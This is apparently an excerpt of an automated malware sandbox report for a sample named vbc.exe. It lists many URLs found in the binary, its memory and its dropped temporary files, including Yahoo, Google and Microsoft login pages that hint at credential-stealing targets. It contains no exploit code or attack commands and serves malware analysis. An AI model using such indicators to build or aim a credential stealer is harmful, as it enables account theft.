00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
            Source: bhv2307.tmp.23.dr, bhvED61.tmp.19.dr, bhvBB7.tmp.21.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhvAE74.tmp.6.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: bhvAE74.tmp.6.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: vbc.exe, 00000002.00000003.258804359.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.280774085.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297394519.000000000275B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
Source: vbc.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://pki.goog/repository/0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/
Source: vbc.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
